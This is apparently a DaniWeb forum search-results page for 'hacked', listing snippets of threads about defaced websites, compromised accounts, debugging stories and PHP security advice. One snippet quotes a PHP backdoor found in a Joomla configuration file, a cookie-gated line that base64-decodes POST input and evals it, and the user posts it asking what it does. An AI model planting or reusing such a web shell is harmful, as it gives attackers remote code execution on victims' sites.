Menu
Menu
DaniWeb
Log In
Sign Up
Read
Contribute
Meet
Search
Search
About 1,000 results for
hacked
- Page 1
Buggy career talk :-P
Programming
3 Weeks Ago
by Dani
… between myself and James that lead to our database being
hacked
in 2015. We are still experiencing the fallout from that…
Re: Cannot run exe from asp.net
Programming
Web Development
1 Week Ago
by john_111
… on another computer, the entire world wide web would be
hacked
into tiny pieces and cease to exist. No one would…
Re: Buggy career talk :-P
Programming
3 Weeks Ago
by Reverend Jim
The most challenging bug was one I introduced myself. While making a miniscule code change I decided to improve the readability of the following line by inserting a space. In today's code that would not be a problem, however, most of our code (AGC/SCADA) was written in FORTRAN. Those of you who made your bones in the punch card era, or know a …
Re: Buggy career talk :-P
Programming
3 Weeks Ago
by pritaeas
The one with the most impact was a Firebird library update, which appeared low to no impact. After deploying at a customer, the library soon showed a complete disregard for database transactions. This mangled the client's database completely and caused us to retrace all changes by hand to undo the damage done. Several weeks worth of misery... …
Re: Buggy career talk :-P
Programming
2 Weeks Ago
by Salem
This https://en.wikipedia.org/wiki/Peterson%27s_algorithm Plus two different kinds of processors. Plus an error rate of less than once a week. After many months, the cause was eventually captured on a bus analyser. After which, the solution was obvious after a bit of RTFM. Turned out that one of the processors had the then awesome new …
hacked
Programming
Web Development
10 Years Ago
by edbr
very embarassing but i just got
hacked
by the folloeing, any advise truly welcome
Hacked
By : Mr.HaurgeulisX196 TypingText = function(element, interval, cursor…
Hacked satellites
Community Center
Geeks' Lounge
19 Years Ago
by cansouth
A private person has
hacked
at least one satellite, and sends out illegal signals (beams… planet with satellite signals (beams). The person who has
hacked
one or more satellites, can send much more dangerous signals…space is extremely risky and dangerous. The person which has
hacked
one or more satellites, probably uses private equipment to …
hacked by phantom
Programming
Web Development
13 Years Ago
by karthik_ppts
Hi frendz In my website somebody changes the content as [B]"
hacked
by phantom"[/B]. Anybody heard about this word "
hacked
by phantom" and what is the issue? Any virus? or Hackers?
Hacked email account :(
Hardware and Software
Information Security
13 Years Ago
by Nance23
… I haven't used in a couple of years got
hacked
. One of my friend emailed me to let me know… people on my contact list. I think it just got
hacked
through a web based email not an email program. Please…
Hacked by godzilla
Hardware and Software
Microsoft Windows
17 Years Ago
by prklg1
Dear friends, Is any one aware about
hacked
by godizlla displayed in the internet explorer title page. i have tried to remove it then also am facing the same issue. it some virus in my system, if anyone knows the solution for this pls help me out... Thanks, Prakash.R
hacked by sam 2008-feb-14 all the time
Hardware and Software
Information Security
15 Years Ago
by bwanajim
whenever i open the internet a caption at the end of the e icon appears thus;-
Hacked
by sam 2008-feb-14 . please help me on how to remove it since my anti virus and spyware are not equal to the task.
Re: hacked by sam 2008-feb-14 all the time
Hardware and Software
Information Security
15 Years Ago
by PhilliePhan
… caption at the end of the e icon appears thus;-
Hacked
by sam 2008-feb-14 . please help me on how…
hacked joomla
Programming
Web Development
13 Years Ago
by left19
My site was
hacked
. They inserted this into livesite on configuartion.php [code]if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);} echo '<name=c></textarea>';exit;}[/code] what does it say??? Thanks
Re: hacked joomla
Programming
Web Development
13 Years Ago
by mslade
[QUOTE=left19;1564110]My site was
hacked
. They inserted this into livesite on configuartion.php if (!empty($…
Hacked Website how to retrieve/fix
Programming
Web Development
11 Years Ago
by Captain119
…. a few days ago the site's ftp account got
hacked
and all the files been modified. i reset all the…
Re: Hacked Website how to retrieve/fix
Programming
Web Development
11 Years Ago
by Anima Templi
… one of the biggest reasons for websites/server to get
hacked
. 2. Weak passwords or use of standard passwords. etc. About…
Hacked Opera starts spinning like crazy
Hardware and Software
Information Security
11 Years Ago
by happygeek
… browser, has admitted that its internal network infrastructure has been
hacked
you have every right to be a little concerned. That…
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
sorry it freaked ne out just time to update its an old site and i should have not been complacent with upgrading security .still im open to suggestions
Re: hacked
Programming
Web Development
10 Years Ago
by cereal
Hi, try to understand how the infection was accomplished, if by using a compromised FTP account (check server logs, change passwords, secure client machines) or because of a code bug, in this last case there's a lot of documentation you can read: * http://php.net/manual/en/security.php * http://phpsec.org/projects/guide/ * https://www.owasp.org/…
Re: hacked
Programming
Web Development
10 Years Ago
by iamthwee
Also something that is often overlooked. Check your host machine, i.e the one you are ftping stuff to your website. Sometimes your host machine can be compromised, with keyloggers if you're on windows, thus meaning any time you change your site details and passwords won't matter because your own machine is where the problem lies. If you're using …
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
thank you. i have two areas i need to check, first being an 'admin' section that i really should have changed yonks ago so thats my first. i deleted that straight away till i rewrite it. I just downloaded the zap vunerability scanner so im hoping that will show light on the error. Never used it but looks promising. hacker did me a favour in that …
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
ok first question, if i may i have a select based on a $_get value renamed $where. the value is a 4 numbers is this enough of a filte to stop a posissible vunerability? $where = filter_input(INPUT_GET, 'recordID', FILTER_SANITIZE_NUMBER_INT );
Re: hacked
Programming
Web Development
10 Years Ago
by iamthwee
There are a few cases where vulnerabilities can occur, first and most important are file uploads, or writing files to your server. Ensure nobody can hijack any of your scripts to write php files to your server. Only allow files upload of certain types e.g png, jpg, gif. Second ensure your queriers are protected using mysql_real_escape or mysqli…
Re: hacked
Programming
Web Development
10 Years Ago
by cereal
If referring to `filter_input()` this is not custom, it's part of PHP: * http://php.net/manual/en/function.filter-input.php and it's ok, even submitting something like `10 OR 1=1` the filter will sanitize it to `1011`. But keep in mind that it doesn't affects `$_GET`, `$_POST` and `$_REQUEST`, so never do: $record = filter_input(INPUT_GET, '…
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
thanks both of you. i susupect thats my vunerabilities i had converted to mysqli a whaile ago but did not use prepared statements. i dumbly thought i was toasty with that andthat the permissions were select only. i have now read further which clearly i should have before, well im working my way through the site now making the changes. i eventually …
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
i think i have my answer but id like to keep this thread opem for now tilli run through all my site issues
Re: hacked
Programming
Web Development
10 Years Ago
by edbr
well, have changed all my site to use prepare and try, I struggled with some pagination issues converting that to prepared statements, though but seem to have got it so far. next issue concerns crf, which confounds me a bit, any one got opinions on crf magic? i dont want to be under false imression that im safe and toasty. http://csrf.htmlpurifier.…
Media FAIL: Twitter not hacked
Hardware and Software
Networking
15 Years Ago
by happygeek
…, not least considering that Twitter has not actually been
hacked
at all. It is surely stretching both journalistic and … to the limit to proclaim that Twitter has been
hacked
when in actual fact the security breach was concerning… Twitter was targeted and her personal email account was
hacked
" which allowed the hacker to gain enough personal…
php site was hacked
Programming
Web Development
15 Years Ago
by jobojo
…about a year or two ago, the site was
hacked
. There is all fictitious information on the site (…to function properly due to the site being
hacked
. I have went into many of the pages…problematic area(s) of the site from being
hacked
again. For most of the day today I… one of the pages of the site:[/B]
Hacked
by ehsan! IRANIAN THE BEST HACKERS IN THE …
Is my site hacked...?
Hardware and Software
Information Security
15 Years Ago
by chand.
… an entry that I write below. heady00.com
hacked
by OsmanliTIM heady00.com
hacked
by OsmanliTIM. ... That is my site heady00.com… I don't know what's wrong with it.
Hacked
means what ? I don't have any crucial or important…
1
2
3
17
Next
Last
Search
Search
Forums
Forum Index
Hardware/Software
Recommended Topics
Programming
Recommended Topics
Digital Media
Recommended Topics
Community Center
Recommended Topics
Latest Content
Newest Topics
Latest Topics
Latest Posts
Latest Comments
Top Tags
Topics Feed
Social
Top Members
Meet People
Community Functions
DaniWeb Premium
Newsletter Archive
Markdown Syntax
Community Rules
Developer APIs
Connect API
Forum API Docs
Tools
SEO Backlink Checker
Legal
Terms of Service
Privacy Policy
FAQ
About Us
Advertise
Contact Us
© 2025 DaniWeb® LLC